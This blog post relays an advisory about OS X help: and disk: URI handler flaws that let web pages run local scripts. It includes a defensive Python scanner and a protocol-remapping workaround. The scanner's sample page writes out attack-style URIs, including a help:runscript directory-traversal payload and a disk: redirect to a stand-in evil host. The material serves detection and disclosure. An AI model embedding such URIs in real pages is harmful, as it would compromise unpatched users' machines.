
Massive OS X Security Issue

Jay Allen and Liz Lawley are talking about a serious security hole in OS X.


Two vulnerabilities have been reported in Mac OS X, allowing malicious web sites to compromise a vulnerable system.

1) The problem is that the “help” URI handler allows execution of arbitrary local scripts (.scpt) via the classic directory traversal character sequence using “help:runscript”.

2) It is reportedly also possible to silently place arbitrary files in a known location, including script files, on a user’s system using the “disk” URI handler.

Various variants of the URI handler vulnerabilities are currently being discussed. This has been confirmed on Macintosh OS X using Safari 1.2.1 (v125.1) and Internet Explorer 5.2. Other browsers may also be used as attack vectors.

NOTE: The rating has been upgraded to “Extremely Critical” because the issues are very easy to exploit and a large number of working exploits are available.
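The advisory above says the attack is delivered by a web page that invokes the help: handler (with a directory traversal sequence behind help:runscript) or the disk: handler. A quick way to triage a suspect page, a cached proxy response, or a saved e-mail body for those triggers is to pull out every URI a browser would follow and flag the two schemes. The scanner below is an added example written for this post, not code from the original article, from Secunia, or from Apple; the sample page it scans is constructed here to mirror the advisory's description, and the traversal pattern it looks for (`../`, including percent-encoded forms) is an assumption about what the advisory's "classic directory traversal character sequence" means.

```python
import re
from html.parser import HTMLParser
from typing import Optional
from urllib.parse import unquote

# The two URL schemes the advisory names. Schemes are matched
# case-insensitively (RFC 3986 treats them as case-insensitive).
RISKY_SCHEMES = ("help", "disk")

# Attribute values a browser follows or loads without a click.
URL_ATTRIBUTES = {"href", "src", "action", "data"}

_SCHEME_RE = re.compile(r"^\s*(?P<scheme>[A-Za-z][A-Za-z0-9+.-]*):(?P<rest>.*)$", re.S)
# Assumption: "classic directory traversal" means a ../ (or ..\) sequence.
_TRAVERSAL_RE = re.compile(r"\.\.[/\\]")
# <meta http-equiv="refresh" content="0;url=..."> carries its URI after url=.
_REFRESH_URL_RE = re.compile(r"url\s*=\s*(.+)", re.I)
# Raw sweep for scheme strings inside script bodies and event handlers.
_RAW_URI_RE = re.compile(r"(?i)\b(?:help|disk):[^\s'\"<>]+")


def classify_uri(uri: str) -> Optional[dict]:
    """Return a finding for a help:/disk: URI, or None for anything else.

    The part after the scheme is percent-decoded twice before the
    traversal check so that ..%2F and double-encoded ..%252F are caught.
    """
    m = _SCHEME_RE.match(uri)
    if not m:
        return None
    scheme = m.group("scheme").lower()
    if scheme not in RISKY_SCHEMES:
        return None
    rest = unquote(unquote(m.group("rest")))
    return {
        "scheme": scheme,
        "uri": uri.strip(),
        "traversal": bool(_TRAVERSAL_RE.search(rest)),
        "runscript": scheme == "help" and "runscript" in rest.lower(),
    }


class _UriCollector(HTMLParser):
    """Collects every attribute value that a browser would treat as a URI."""

    def __init__(self):
        super().__init__()
        self.uris = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if not value:
                continue
            name = name.lower()
            if name == "content":
                m = _REFRESH_URL_RE.search(value)
                if m:
                    self.uris.append(m.group(1).strip())
            elif name in URL_ATTRIBUTES:
                self.uris.append(value)


def scan_html(document: str) -> list:
    """Return one finding per distinct help:/disk: URI found in the page."""
    collector = _UriCollector()
    collector.feed(document)
    candidates = list(collector.uris) + _RAW_URI_RE.findall(document)
    findings, seen = [], set()
    for uri in candidates:
        finding = classify_uri(uri)
        if finding and finding["uri"] not in seen:
            seen.add(finding["uri"])
            findings.append(finding)
    return findings


# Constructed sample page: one benign link, an iframe using help:runscript
# with traversal, a meta refresh to the disk: handler, and a script redirect
# using an upper-case scheme and percent-encoded traversal.
SAMPLE_PAGE = """<html><body>
<a href="http://example.com/docs">Docs</a>
<iframe src="help:runscript:../../../../Volumes/evil/payload.scpt"></iframe>
<meta http-equiv="refresh" content="0;url=disk://example.com/evil.img">
<script>window.location = "HELP:runscript:..%2F..%2FUsers%2Fvictim%2Fpwn.scpt";</script>
</body></html>"""

if __name__ == "__main__":
    for f in scan_html(SAMPLE_PAGE):
        flags = [k for k in ("traversal", "runscript") if f[k]]
        print(f"{f['scheme']}: {f['uri']}  flags={flags}")
```

Any hit on these schemes from a web page is worth looking at regardless of the traversal and runscript flags, since the advisory notes that other variants are still being discussed; the flags only mark the URIs that match the two forms it describes explicitly. Expect some noise from the raw sweep on pages that legitimately mention "help:" in text.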

There are even more details on MacNN, but if you just want to fix it, Liz suggests:


If, like me, you just want to know how to fix this fast (since Apple has apparently known about this since February and hasn’t fixed it, it wouldn’t be wise to wait for their patch), here’s the approach to use.

    1. Download the freeware tool MoreInternet.

    2. From the disk image, run “install prefpane,” which will put the MoreInternet preference panel into your System Preferences panel.

    3. Open the MoreInternet panel, and select the help: protocol.

    4. Change the application it launches from the Help Viewer (which has the script-running vulnerability) to something benign. (I used TextEdit.) I used Chess, which, unlike TextEdit, gives me a clear visual cue that a page tried to invoke the help: protocol.

    5. Make sure it worked by going to the scary but harmless example.

UPDATE: MacNN is reporting that Apple is “taking this very seriously” and is “actively investigating this potential security issue.”
